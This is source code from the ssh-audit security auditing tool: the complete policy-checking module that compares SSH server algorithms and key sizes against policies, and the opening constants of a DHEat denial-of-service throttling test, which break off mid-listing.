"""
   The MIT License (MIT)

   Copyright (C) 2020-2024 Joe Testa (jtesta@positronsecurity.com)

   Permission is hereby granted, free of charge, to any person obtaining a copy
   of this software and associated documentation files (the "Software"), to deal
   in the Software without restriction, including without limitation the rights
   to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
   copies of the Software, and to permit persons to whom the Software is
   furnished to do so, subject to the following conditions:

   The above copyright notice and this permission notice shall be included in
   all copies or substantial portions of the Software.

   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
   IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
   FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
   AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
   LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
   THE SOFTWARE.
"""
import copy
import json
import sys

from typing import Dict, List, Tuple
from typing import Optional, Any, Union, cast
from datetime import date

from ssh_audit import exitcodes
from ssh_audit.banner import Banner
from ssh_audit.builtin_policies import BUILTIN_POLICIES
from ssh_audit.globals import SNAP_PACKAGE, SNAP_PERMISSIONS_ERROR
from ssh_audit.ssh2_kex import SSH2_Kex


# Validates policy files and performs policy testing
class Policy:

    WARNING_DEPRECATED_DIRECTIVES = "\nWARNING: this policy is using deprecated features.  Future versions of ssh-audit may remove support for them.  Re-generating the policy file is perhaps the most straight-forward way of resolving this issue.  Manually converting the 'hostkey_size_*', 'cakey_size_*', and 'dh_modulus_size_*' directives into the new format is another option.\n"

    def __init__(self, policy_file: Optional[str] = None, policy_data: Optional[str] = None, manual_load: bool = False, json_output: bool = False) -> None:
        self._name: Optional[str] = None
        self._version: Optional[str] = None
        self._banner: Optional[str] = None
        self._compressions: Optional[List[str]] = None
        self._host_keys: Optional[List[str]] = None
        self._optional_host_keys: Optional[List[str]] = None
        self._kex: Optional[List[str]] = None
        self._ciphers: Optional[List[str]] = None
        self._macs: Optional[List[str]] = None
        self._hostkey_sizes: Optional[Dict[str, Dict[str, Union[int, str, bytes]]]] = None
        self._dh_modulus_sizes: Optional[Dict[str, int]] = None
        self._server_policy = True
        self._allow_algorithm_subset_and_reordering = False
        self._allow_larger_keys = False
        self._errors: List[Any] = []
        self._updated_builtin_policy_available = False  # If True, an outdated built-in policy was loaded.

        self._name_and_version: str = ''

        # If invoked while JSON output is expected, send warnings to stderr instead of stdout (which would corrupt the JSON output).
        if json_output:
            self._warning_target = sys.stderr
        else:
            self._warning_target = sys.stdout

        # Ensure that only one mode was specified.
        num_modes = 0
        if policy_file is not None:
            num_modes += 1
        if policy_data is not None:
            num_modes += 1
        if manual_load is True:
            num_modes += 1

        if num_modes != 1:
            raise RuntimeError('Exactly one of the following can be specified only: policy_file, policy_data, or manual_load')

        if manual_load:
            return

        if policy_file is not None:
            try:
                with open(policy_file, "r", encoding='utf-8') as f:
                    policy_data = f.read()
            except FileNotFoundError:
                print("Error: policy file not found: %s" % policy_file)
                sys.exit(exitcodes.UNKNOWN_ERROR)
            except PermissionError as e:
                # If installed as a Snap package, print a more useful message with potential work-arounds.
                if SNAP_PACKAGE:
                    print(SNAP_PERMISSIONS_ERROR)
                else:
                    print("Error: insufficient permissions: %s" % str(e))
                sys.exit(exitcodes.UNKNOWN_ERROR)

        lines = []
        if policy_data is not None:
            lines = policy_data.split("\n")

        for line in lines:
            line = line.strip()
            if (len(line) == 0) or line.startswith('#'):
                continue

            key = None
            val = None
            try:
                key, val = line.split('=')
            except ValueError as ve:
                raise ValueError("could not parse line: %s" % line) from ve

            key = key.strip()
            val = val.strip()

            if key not in ['name', 'version', 'banner', 'compressions', 'host keys', 'optional host keys', 'key exchanges', 'ciphers', 'macs', 'client policy', 'host_key_sizes', 'dh_modulus_sizes', 'allow_algorithm_subset_and_reordering', 'allow_larger_keys'] and not key.startswith('hostkey_size_') and not key.startswith('cakey_size_') and not key.startswith('dh_modulus_size_'):
                raise ValueError("invalid field found in policy: %s" % line)

            if key in ['name', 'banner']:

                # If the banner value is blank, set it to "" so that the code below handles it.
                if len(val) < 2:
                    val = "\"\""

                if (val[0] != '"') or (val[-1] != '"'):
                    raise ValueError('the value for the %s field must be enclosed in quotes: %s' % (key, val))

                # Remove the surrounding quotes, and unescape quotes & newlines.
                val = val[1:-1]. replace("\\\"", "\"").replace("\\n", "\n")

                if key == 'name':
                    self._name = val
                elif key == 'banner':
                    self._banner = val

            elif key == 'version':
                self._version = val

            elif key in ['compressions', 'host keys', 'optional host keys', 'key exchanges', 'ciphers', 'macs']:
                try:
                    algs = val.split(',')
                except ValueError:
                    # If the value has no commas, then set the algorithm list to just the value.
                    algs = [val]

                # Strip whitespace in each algorithm name.
                algs = [alg.strip() for alg in algs]

                if key == 'compressions':
                    self._compressions = algs
                elif key == 'host keys':
                    self._host_keys = algs
                elif key == 'optional host keys':
                    self._optional_host_keys = algs
                elif key == 'key exchanges':
                    self._kex = algs
                elif key == 'ciphers':
                    self._ciphers = algs
                elif key == 'macs':
                    self._macs = algs

            elif key.startswith('hostkey_size_'):  # Old host key size format.
                print(Policy.WARNING_DEPRECATED_DIRECTIVES, file=self._warning_target)  # Warn the user that the policy file is using deprecated directives.

                hostkey_type = key[13:]
                hostkey_size = int(val)

                if self._hostkey_sizes is None:
                    self._hostkey_sizes = {}

                self._hostkey_sizes[hostkey_type] = {'hostkey_size': hostkey_size, 'ca_key_type': '', 'ca_key_size': 0}

            elif key.startswith('cakey_size_'):  # Old host key size format.
                print(Policy.WARNING_DEPRECATED_DIRECTIVES, file=self._warning_target)  # Warn the user that the policy file is using deprecated directives.

                hostkey_type = key[11:]
                ca_key_size = int(val)

                ca_key_type = 'ssh-ed25519'
                if hostkey_type in ['ssh-rsa-cert-v01@openssh.com', 'rsa-sha2-256-cert-v01@openssh.com', 'rsa-sha2-512-cert-v01@openssh.com']:
                    ca_key_type = 'ssh-rsa'

                if self._hostkey_sizes is None:
                    self._hostkey_sizes = {}
                self._hostkey_sizes[hostkey_type] = {'hostkey_size': hostkey_size, 'ca_key_type': ca_key_type, 'ca_key_size': ca_key_size}

            elif key == 'host_key_sizes':  # New host key size format.
                self._hostkey_sizes = json.loads(val)

                # Fill in the trimmed fields that were omitted from the policy.
                self._normalize_hostkey_sizes()

            elif key.startswith('dh_modulus_size_'):  # Old DH modulus format.
                print(Policy.WARNING_DEPRECATED_DIRECTIVES, file=self._warning_target)  # Warn the user that the policy file is using deprecated directives.

                dh_type = key[16:]
                dh_size = int(val)

                if self._dh_modulus_sizes is None:
                    self._dh_modulus_sizes = {}

                self._dh_modulus_sizes[dh_type] = dh_size

            elif key == 'dh_modulus_sizes':  # New DH modulus format.
                self._dh_modulus_sizes = json.loads(val)

            elif key.startswith('client policy') and val.lower() == 'true':
                self._server_policy = False
            elif key == 'allow_algorithm_subset_and_reordering' and val.lower() == 'true':
                self._allow_algorithm_subset_and_reordering = True
            elif key == 'allow_larger_keys' and val.lower() == 'true':
                self._allow_larger_keys = True

        if self._name is None:
            raise ValueError('The policy does not have a name field.')
        if self._version is None:
            raise ValueError('The policy does not have a version field.')

        self._name_and_version = "%s (version %s)" % (self._name, self._version)


    def _append_error(self, mismatched_field: str, expected_required: Optional[List[str]], expected_optional: Optional[List[str]], actual: List[str]) -> None:
        if expected_required is None:
            expected_required = ['']
        if expected_optional is None:
            expected_optional = ['']
        self._errors.append({'mismatched_field': mismatched_field, 'expected_required': expected_required, 'expected_optional': expected_optional, 'actual': actual})


    def _normalize_hostkey_sizes(self) -> None:
        '''Normalizes the self._hostkey_sizes structure to ensure all required fields are present.'''

        if self._hostkey_sizes is not None:
            for host_key_type in self._hostkey_sizes:
                if 'ca_key_type' not in self._hostkey_sizes[host_key_type]:
                    self._hostkey_sizes[host_key_type]['ca_key_type'] = ''
                if 'ca_key_size' not in self._hostkey_sizes[host_key_type]:
                    self._hostkey_sizes[host_key_type]['ca_key_size'] = 0
                if 'raw_hostkey_bytes' not in self._hostkey_sizes[host_key_type]:
                    self._hostkey_sizes[host_key_type]['raw_hostkey_bytes'] = b''


    @staticmethod
    def create(source: Optional[str], banner: Optional['Banner'], kex: Optional['SSH2_Kex'], client_audit: bool) -> str:
        '''Creates a policy based on a server configuration.  Returns a string.'''

        today = date.today().strftime('%Y/%m/%d')
        compressions = None
        host_keys = None
        kex_algs = None
        ciphers = None
        macs = None
        dh_modulus_sizes_str = ''
        client_policy_str = ''
        host_keys_json = ''

        if client_audit:
            client_policy_str = "\n# Set to true to signify this is a policy for clients, not servers.\nclient policy = true\n"

        if kex is not None:
            if kex.server.compression is not None:
                compressions = ', '.join(kex.server.compression)
            if kex.key_algorithms is not None:
                host_keys = ', '.join(kex.key_algorithms)
            if kex.kex_algorithms is not None:
                kex_algs = ', '.join(kex.kex_algorithms)
            if kex.server.encryption is not None:
                ciphers = ', '.join(kex.server.encryption)
            if kex.server.mac is not None:
                macs = ', '.join(kex.server.mac)

            if kex.host_keys():

                # Make a deep copy of the host keys dict, then delete all the raw hostkey bytes from the copy.
                host_keys_trimmed = copy.deepcopy(kex.host_keys())
                for hostkey_alg in host_keys_trimmed:
                    del host_keys_trimmed[hostkey_alg]['raw_hostkey_bytes']

                    # Delete the CA signature if any of its fields are empty.
                    if host_keys_trimmed[hostkey_alg]['ca_key_type'] == '' or host_keys_trimmed[hostkey_alg]['ca_key_size'] == 0:
                        del host_keys_trimmed[hostkey_alg]['ca_key_type']
                        del host_keys_trimmed[hostkey_alg]['ca_key_size']

                host_keys_json = "\n# Dictionary containing all host key and size information.  Optionally contains the certificate authority's signature algorithm ('ca_key_type') and signature length ('ca_key_size'), if any.\nhost_key_sizes = %s\n" % json.dumps(host_keys_trimmed)

            if kex.dh_modulus_sizes():
                dh_modulus_sizes_str = "\n# Group exchange DH modulus sizes.\ndh_modulus_sizes = %s\n" % json.dumps(kex.dh_modulus_sizes())


        policy_data = '''#
# Custom policy based on %s (created on %s)
#
%s
# The name of this policy (displayed in the output during scans).  Must be in quotes.
name = "Custom Policy (based on %s on %s)"

# The version of this policy (displayed in the output during scans).  Not parsed, and may be any value, including strings.
version = 1

# When false, host keys, kex, ciphers, and MAC lists must match exactly.  When true, the target host may support a subset of the specified algorithms and/or algorithms may appear in a different order; this feature is useful for specifying a baseline and allowing some hosts the option to implement stricter controls.
allow_algorithm_subset_and_reordering = false

# When false, host keys, CA keys, and Diffie-Hellman key sizes must exactly match what's specified in this policy.  When true, target systems are allowed to have larger keys; this feature is useful for specifying a baseline and allowing some hosts the option to implement stricter controls.
allow_larger_keys = false

# The banner that must match exactly.  Commented out to ignore banners, since minor variability in the banner is sometimes normal.
# banner = "%s"

# The compression options that must match exactly (order matters).  Commented out to ignore by default.
# compressions = %s
%s%s
# The host key types that must match exactly (order matters).
host keys = %s

# Host key types that may optionally appear.
#optional host keys = ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com

# The key exchange algorithms that must match exactly (order matters).
key exchanges = %s

# The ciphers that must match exactly (order matters).
ciphers = %s

# The MACs that must match exactly (order matters).
macs = %s
''' % (source, today, client_policy_str, source, today, banner, compressions, host_keys_json, dh_modulus_sizes_str, host_keys, kex_algs, ciphers, macs)

        return policy_data


    def evaluate(self, banner: Optional['Banner'], kex: Optional['SSH2_Kex']) -> Tuple[bool, List[Dict[str, str]], str]:
        '''Evaluates a server configuration against this policy.  Returns a tuple of a boolean (True if server adheres to policy) and an array of strings that holds error messages.'''

        ret = True

        banner_str = str(banner)
        if (self._banner is not None) and (banner_str != self._banner):
            ret = False
            self._append_error('Banner', [self._banner], None, [banner_str])

        # All subsequent tests require a valid kex, so end here if we don't have one.
        if kex is None:
            error_list, error_str = self._get_errors()
            return ret, error_list, error_str

        if (self._compressions is not None) and (kex.server.compression != self._compressions):
            ret = False
            self._append_error('Compression', self._compressions, None, kex.server.compression)

        # If a list of optional host keys was given in the policy, remove any of its entries from the list retrieved from the server.  This allows us to do an exact comparison with the expected list below.
        pruned_host_keys = kex.key_algorithms
        if self._optional_host_keys is not None:
            pruned_host_keys = [x for x in kex.key_algorithms if x not in self._optional_host_keys]

        # Check host keys.
        if self._host_keys is not None:
            # If the policy allows subsets and re-ordered algorithms...
            if self._allow_algorithm_subset_and_reordering:
                for hostkey_t in kex.key_algorithms:
                    if hostkey_t not in self._host_keys:
                        ret = False
                        self._append_error('Host keys', self._host_keys, self._optional_host_keys, kex.key_algorithms)
                        break
            # The policy requires exact matching of algorithms.
            elif pruned_host_keys != self._host_keys:
                ret = False
                self._append_error('Host keys', self._host_keys, self._optional_host_keys, kex.key_algorithms)

        # Check host key sizes.
        if self._hostkey_sizes is not None:
            hostkey_types = list(self._hostkey_sizes.keys())
            hostkey_types.sort()  # Sorted to make testing output repeatable.
            for hostkey_type in hostkey_types:
                expected_hostkey_size = cast(int, self._hostkey_sizes[hostkey_type]['hostkey_size'])
                server_host_keys = kex.host_keys()
                if hostkey_type in server_host_keys:
                    actual_hostkey_size = cast(int, server_host_keys[hostkey_type]['hostkey_size'])
                    if (self._allow_larger_keys and actual_hostkey_size < expected_hostkey_size) or \
                       (not self._allow_larger_keys and actual_hostkey_size != expected_hostkey_size):
                        ret = False
                        self._append_error('Host key (%s) sizes' % hostkey_type, [str(expected_hostkey_size)], None, [str(actual_hostkey_size)])

                    # If we have expected CA signatures set, check them against what the server returned.
                    if self._hostkey_sizes is not None and len(cast(str, self._hostkey_sizes[hostkey_type]['ca_key_type'])) > 0 and cast(int, self._hostkey_sizes[hostkey_type]['ca_key_size']) > 0:
                        expected_ca_key_type = cast(str, self._hostkey_sizes[hostkey_type]['ca_key_type'])
                        expected_ca_key_size = cast(int, self._hostkey_sizes[hostkey_type]['ca_key_size'])
                        actual_ca_key_type = cast(str, server_host_keys[hostkey_type]['ca_key_type'])
                        actual_ca_key_size = cast(int, server_host_keys[hostkey_type]['ca_key_size'])

                        # Ensure that the CA signature type is what's expected (i.e.: the server doesn't have an RSA sig when we're expecting an ED25519 sig).
                        if actual_ca_key_type != expected_ca_key_type:
                            ret = False
                            self._append_error('CA signature type', [expected_ca_key_type], None, [actual_ca_key_type])
                        # Ensure that the actual and expected signature sizes match.
                        elif (self._allow_larger_keys and actual_ca_key_size < expected_ca_key_size) or \
                             (not self._allow_larger_keys and actual_ca_key_size != expected_ca_key_size):
                            ret = False
                            self._append_error('CA signature size (%s)' % actual_ca_key_type, [str(expected_ca_key_size)], None, [str(actual_ca_key_size)])

        # Check key exchanges.
        if self._kex is not None:
            # If the policy allows subsets and re-ordered algorithms...
            if self._allow_algorithm_subset_and_reordering:
                for kex_t in kex.kex_algorithms:
                    if kex_t not in self._kex:
                        ret = False
                        self._append_error('Key exchanges', self._kex, None, kex.kex_algorithms)
                        break
                # If kex-strict-?-v00@openssh.com is in the policy (i.e. the Terrapin vulnerability countermeasure), then it must appear in the server's list, regardless of the "allow_algorithm_subset_and_reordering" flag.
                if ('kex-strict-s-v00@openssh.com' in self._kex and 'kex-strict-s-v00@openssh.com' not in kex.kex_algorithms) or \
                   ('kex-strict-c-v00@openssh.com' in self._kex and 'kex-strict-c-v00@openssh.com' not in kex.kex_algorithms):
                    ret = False
                    self._append_error('Key exchanges', self._kex, None, kex.kex_algorithms)

            # The policy requires exact matching of algorithms.
            elif kex.kex_algorithms != self._kex:
                ret = False
                self._append_error('Key exchanges', self._kex, None, kex.kex_algorithms)

        # Checking Ciphers
        if self._ciphers is not None:
            # If the policy allows subsets and re-ordered algorithms...
            if self._allow_algorithm_subset_and_reordering:
                for cipher_t in kex.server.encryption:
                    if cipher_t not in self._ciphers:
                        ret = False
                        self._append_error('Ciphers', self._ciphers, None, kex.server.encryption)
                        break
            # The policy requires exact matching of algorithms.
            elif kex.server.encryption != self._ciphers:
                ret = False
                self._append_error('Ciphers', self._ciphers, None, kex.server.encryption)

        # Checking MACs
        if self._macs is not None:
            # If the policy allows subsets and re-ordered algorithms...
            if self._allow_algorithm_subset_and_reordering:
                for mac_t in kex.server.mac:
                    if mac_t not in self._macs:
                        ret = False
                        self._append_error('MACs', self._macs, None, kex.server.mac)
                        break
            # The policy requires exact matching of algorithms.
            elif kex.server.mac != self._macs:
                ret = False
                self._append_error('MACs', self._macs, None, kex.server.mac)

        if self._dh_modulus_sizes is not None:
            dh_modulus_types = list(self._dh_modulus_sizes.keys())
            dh_modulus_types.sort()  # Sorted to make testing output repeatable.
            for dh_modulus_type in dh_modulus_types:
                expected_dh_modulus_size = self._dh_modulus_sizes[dh_modulus_type]
                if dh_modulus_type in kex.dh_modulus_sizes():
                    actual_dh_modulus_size = kex.dh_modulus_sizes()[dh_modulus_type]
                    if (self._allow_larger_keys and actual_dh_modulus_size < expected_dh_modulus_size) or \
                       (not self._allow_larger_keys and actual_dh_modulus_size != expected_dh_modulus_size):
                        ret = False
                        self._append_error('Group exchange (%s) modulus sizes' % dh_modulus_type, [str(expected_dh_modulus_size)], None, [str(actual_dh_modulus_size)])

        error_list, error_str = self._get_errors()
        return ret, error_list, error_str


    def _get_errors(self) -> Tuple[List[Any], str]:
        '''Returns the list of errors, along with the string representation of those errors.'''

        subset_and_reordering_semicolon = "; subset and/or reordering allowed" if self._allow_algorithm_subset_and_reordering else "; exact match"
        subset_and_reordering_parens = " (subset and/or reordering allowed)" if self._allow_algorithm_subset_and_reordering else ""
        error_list = []
        spacer = ''
        for e in self._errors:
            e_str = "  * %s did not match.\n" % e['mismatched_field']

            if ('expected_optional' in e) and (e['expected_optional'] != ['']):
                e_str += "    - Expected (required%s): %s\n    - Expected (optional): %s\n" % (subset_and_reordering_semicolon, Policy._normalize_error_field(e['expected_required']), Policy._normalize_error_field(e['expected_optional']))
                spacer = '              '
            else:
                e_str += "    - Expected%s: %s\n" % (subset_and_reordering_parens, Policy._normalize_error_field(e['expected_required']))
                spacer = '   '
            e_str += "    - Actual:%s%s\n" % (spacer, Policy._normalize_error_field(e['actual']))
            error_list.append(e_str)

        error_list.sort()  # To ensure repeatable results for testing.

        error_str = ''
        if len(error_list) > 0:
            error_str = "\n".join(error_list)

        return self._errors, error_str


    def get_name_and_version(self) -> str:
        '''Returns a string of this Policy's name and version.'''
        return self._name_and_version


    def is_outdated_builtin_policy(self) -> bool:
        '''Returns True if this is a built-in policy that has a more recent version available than currently selected.'''
        return self._updated_builtin_policy_available


    def is_server_policy(self) -> bool:
        '''Returns True if this is a server policy, or False if this is a client policy.'''
        return self._server_policy


    @staticmethod
    def list_builtin_policies(verbose: bool) -> Tuple[List[str], List[str]]:
        '''Returns two lists: a list of names of built-in server policies, and a list of names of built-in client policies, respectively.'''
        server_policy_descriptions = []
        client_policy_descriptions = []

        latest_server_policies: Dict[str, Dict[str, Union[int, str]]] = {}
        latest_client_policies: Dict[str, Dict[str, Union[int, str]]] = {}
        for policy_name, policy in BUILTIN_POLICIES.items():

            # If not in verbose mode, only store the latest version of each policy.
            if not verbose:
                policy_description = "\"{:s}\"".format(policy_name)

                # Truncate the version off the policy name and obtain the version as an integer. (i.e.: "Platform X (version 3)" -> "Platform X", 3
                policy_name_no_version = ""
                version = 0
                version_pos = policy_name.find(" (version ")
                if version_pos != -1:
                    policy_name_no_version = policy_name[0:version_pos]
                    version = int(cast(str, policy['version']))  # Unit tests guarantee this to be parseable as an int.

                d = latest_server_policies if policy['server_policy'] else latest_client_policies
                if policy_name_no_version not in d:
                    d[policy_name_no_version] = {}
                    d[policy_name_no_version]['latest_version'] = version
                    d[policy_name_no_version]['description'] = policy_description
                elif version > cast(int, d[policy_name_no_version]['latest_version']):  # If an updated version of the policy was found, replace the old one.
                    d[policy_name_no_version]['latest_version'] = version
                    d[policy_name_no_version]['description'] = policy_description
            else:  # In verbose mode, return all policy versions.
                policy_description = "\"{:s}\": {:s}".format(policy_name, policy['changelog'])
                if policy['server_policy']:
                    server_policy_descriptions.append(policy_description)
                else:
                    client_policy_descriptions.append(policy_description)

        # Now that we have references to the latest policies only, add their full descriptions to the lists for returning.
        if not verbose:
            for _, dd in latest_server_policies.items():
                server_policy_descriptions.append(cast(str, dd['description']))

            for _, dd in latest_client_policies.items():
                client_policy_descriptions.append(cast(str, dd['description']))

        # Sort the lists for better readability.
        server_policy_descriptions.sort()
        client_policy_descriptions.sort()
        return server_policy_descriptions, client_policy_descriptions


    @staticmethod
    def load_builtin_policy(policy_name: str, json_output: bool = False) -> Optional['Policy']:
        '''Returns a Policy with the specified built-in policy name loaded, or None if no policy of that name exists.'''
        p = None
        if policy_name in BUILTIN_POLICIES:
            policy_struct = BUILTIN_POLICIES[policy_name]
            p = Policy(manual_load=True, json_output=json_output)
            policy_name_without_version = policy_name[0:policy_name.rfind(' (')]
            p._name = policy_name_without_version  # pylint: disable=protected-access
            p._version = cast(str, policy_struct['version'])  # pylint: disable=protected-access
            p._banner = cast(Optional[str], policy_struct['banner'])  # pylint: disable=protected-access
            p._compressions = cast(Optional[List[str]], policy_struct['compressions'])  # pylint: disable=protected-access
            p._host_keys = cast(Optional[List[str]], policy_struct['host_keys'])  # pylint: disable=protected-access
            p._optional_host_keys = cast(Optional[List[str]], policy_struct['optional_host_keys'])  # pylint: disable=protected-access
            p._kex = cast(Optional[List[str]], policy_struct['kex'])  # pylint: disable=protected-access
            p._ciphers = cast(Optional[List[str]], policy_struct['ciphers'])  # pylint: disable=protected-access
            p._macs = cast(Optional[List[str]], policy_struct['macs'])  # pylint: disable=protected-access
            p._hostkey_sizes = cast(Optional[Dict[str, Dict[str, Union[int, str, bytes]]]], policy_struct['hostkey_sizes'])  # pylint: disable=protected-access
            p._dh_modulus_sizes = cast(Optional[Dict[str, int]], policy_struct['dh_modulus_sizes'])  # pylint: disable=protected-access
            p._server_policy = cast(bool, policy_struct['server_policy'])  # pylint: disable=protected-access
            p._name_and_version = "%s (version %s)" % (p._name, p._version)  # pylint: disable=protected-access

            # Ensure this struct has all the necessary fields.
            p._normalize_hostkey_sizes()  # pylint: disable=protected-access

        # Now check if an updated version of the requested policy exists.  If so, set a warning for the user.
        if p is not None and p._version is not None:  # pylint: disable=protected-access
            next_version = str(int(p._version) + 1)  # pylint: disable=protected-access
            name_version_pos = policy_name.find("(version ")
            next_version_name = policy_name[0:name_version_pos] + "(version %s)" % next_version
            if next_version_name in BUILTIN_POLICIES:
                p._updated_builtin_policy_available = True  # pylint: disable=protected-access

        return p


    @staticmethod
    def _normalize_error_field(field: List[str]) -> Any:
        '''If field is an array with a string parsable as an integer, return that integer.  Otherwise, return the field joined with commas.'''
        if len(field) == 1:
            try:
                return int(field[0])
            except ValueError:
                return field[0]
        else:
            return ', '.join(field)


    def __str__(self) -> str:
        undefined = '{undefined}'

        name = undefined
        version = undefined
        banner = undefined
        compressions_str = undefined
        host_keys_str = undefined
        optional_host_keys_str = undefined
        kex_str = undefined
        ciphers_str = undefined
        macs_str = undefined
        hostkey_sizes_str = undefined
        dh_modulus_sizes_str = undefined


        if self._name is not None:
            name = '[%s]' % self._name
        if self._version is not None:
            version = '[%s]' % self._version
        if self._banner is not None:
            banner = '[%s]' % self._banner

        if self._compressions is not None:
            compressions_str = ', '.join(self._compressions)
        if self._host_keys is not None:
            host_keys_str = ', '.join(self._host_keys)
        if self._optional_host_keys is not None:
            optional_host_keys_str = ', '.join(self._optional_host_keys)
        if self._kex is not None:
            kex_str = ', '.join(self._kex)
        if self._ciphers is not None:
            ciphers_str = ', '.join(self._ciphers)
        if self._macs is not None:
            macs_str = ', '.join(self._macs)
        if self._hostkey_sizes is not None:
            hostkey_sizes_str = str(self._hostkey_sizes)
        if self._dh_modulus_sizes is not None:
            dh_modulus_sizes_str = str(self._dh_modulus_sizes)

        return "Name: %s\nVersion: %s\nAllow Algorithm Subset and/or Reordering: %r\nBanner: %s\nCompressions: %s\nHost Keys: %s\nOptional Host Keys: %s\nKey Exchanges: %s\nCiphers: %s\nMACs: %s\nHost Key Sizes: %s\nDH Modulus Sizes: %s\nServer Policy: %r" % (name, version, self._allow_algorithm_subset_and_reordering, banner, compressions_str, host_keys_str, optional_host_keys_str, kex_str, ciphers_str, macs_str, hostkey_sizes_str, dh_modulus_sizes_str, self._server_policy)


    def __getstate__(self) -> Dict[str, Any]:
        '''Called when pickling this object.  The file descriptor isn't serializable, so we'll remove it from the state and include a string representation.'''

        state = self.__dict__.copy()

        if state['_warning_target'] == sys.stdout:
            state['_warning_target_type'] = 'stdout'
        else:
            state['_warning_target_type'] = 'stderr'

        del state['_warning_target']
        return state


    def __setstate__(self, state: Dict[str, Any]) -> None:
        '''Called when unpickling this object.  Based on the string representation of the file descriptor, we'll restore the right handle.'''

        if state['_warning_target_type'] == 'stdout':
            state['_warning_target'] = sys.stdout
        else:
            state['_warning_target'] = sys.stderr

        del state['_warning_target_type']
        self.__dict__.update(state)



"""
   The MIT License (MIT)

   Copyright (C) 2023-2024 Joe Testa (jtesta@positronsecurity.com)

   Permission is hereby granted, free of charge, to any person obtaining a copy
   of this software and associated documentation files (the "Software"), to deal
   in the Software without restriction, including without limitation the rights
   to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
   copies of the Software, and to permit persons to whom the Software is
   furnished to do so, subject to the following conditions:

   The above copyright notice and this permission notice shall be included in
   all copies or substantial portions of the Software.

   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
   IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
   FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
   AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
   LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
   THE SOFTWARE.
"""
import errno
import multiprocessing
import os
import queue
import random
import select
import socket
import struct
import sys
import time
import traceback

from typing import Any, Dict, List, Optional, Tuple

from ssh_audit.auditconf import AuditConf
from ssh_audit.banner import Banner
from ssh_audit import exitcodes
from ssh_audit.gextest import GEXTest
from ssh_audit.globals import SSH_HEADER
from ssh_audit.ssh_socket import SSH_Socket
from ssh_audit.ssh2_kex import SSH2_Kex
from ssh_audit.outputbuffer import OutputBuffer
from ssh_audit.writebuf import WriteBuf


class DHEat:

    # Maximum number of connections per second the server can allow until a warning is issued when Diffie-Hellman algorithms are supported.
    MAX_SAFE_RATE = 20.0

    # The warning added to DH algorithms in the UI when dh_rate_test determines that no throttling is being done.
    DHEAT_WARNING = "Potentially insufficient connection throttling detected, resulting in possible vulnerability to the DHEat DoS attack (CVE-2002-20001).  {connections:d} connections were created in {time_elapsed:.3f} seconds, or {rate:.1f} conns/sec; server must respond with a rate less than {max_safe_rate:.1f} conns/sec per IPv4/IPv6 source address to be considered safe.  For rate-throttling options, please see <https://www.ssh-audit.com/hardening_guides.html>.  Be aware that using 'PerSourceMaxStartups 1' properly protects the server from this attack, but will cause this test to yield a false positive.  Suppress this test and message with the --skip-rate-test option."

    # List of the Diffie-Hellman group exchange algorithms this test supports.
    gex_algs = [
        "diffie-hellman-group-exchange-sha256",  # Implemented in OpenSSH.
        "diffie-hellman-group-exchange-sha1",    # Implemented in OpenSSH.
        "diffie-hellman-group-exchange-sha224@ssh.com",
        "diffie-hellman-group-exchange-sha256@ssh.com",
        "diffie-hellman-group-exchange-sha384@ssh.com",
        "diffie-hellman-group-exchange-sha512@ssh.com",
    ]

    # List of key exchange algorithms, sorted by largest modulus size.
    alg_priority = [
        "diffie-hellman-group18-sha512",  # Implemented in OpenSSH.
        "diffie-hellman-group18-sha512@ssh.com",
        "diffie-hellman-group17-sha512",
        "diffie-hellman_group17-sha512",  # Note that this is not the same as the one above it.
        "diffie-hellman-group16-sha512",  # Implemented in OpenSSH.
        "diffie-hellman-group16-sha256",
        "diffie-hellman-group16-sha384@ssh.com",
        "diffie-hellman-group16-sha512",
        "diffie-hellman-group16-sha512@ssh.com",
        "diffie-hellman-group15-sha256",
        "diffie-hellman-group15-sha256@ssh.com",
        "diffie-hellman-group15-sha384@ssh.com",
        "diffie-hellman-group15-sha512",
        "diffie-hellman-group14-sha256",  # Implemented in OpenSSH.
        "diffie-hellman-group14-sha1",    # Implemented in OpenSSH.
        "diffie-hellman-group14-sha224@ssh.com",
        "diffie-hellman-group14-sha256@ssh.com",
        "diffie-hellman-group1-sha1",     # Implemented in OpenSSH.
        "diffie-hellman-group1-sha256",
        "curve25519-sha256",              # Implemented in OpenSSH.
        "curve25519-sha256@libssh.org",   # Implemented in OpenSSH.
        "ecdh-sha2-nistp256",             # Implemented in OpenSSH.
        "ecdh-sha2-nistp384",             # Implemented in OpenSSH.
        "ecdh-sha2-nistp521",             # Implemented in OpenSSH.
        "sntrup761x25519-sha512@openssh.com",  # Implemented in OpenSSH.
    ]

    # Dictionary of key exchanges mapped to their modulus size.
    alg_modulus_sizes = {
        "diffie-hellman-group18-sha512": 8192,
        "diffie-hellman-group18-sha512@ssh.com": 8192,
        "diffie-hellman-group17-sha512": 6144,
        "diffie-hellman_group17-sha512": 6144,
        "diffie-hellman-group16-sha512": 4096,
        "diffie-hellman-group16-sha256": 4096,
        "diffie-hellman-group16-sha384@ssh.com": 4096,
        "diffie-hellman-group16-sha512@ssh.com": 4096,
        "diffie-hellman-group15-sha256": 3072,
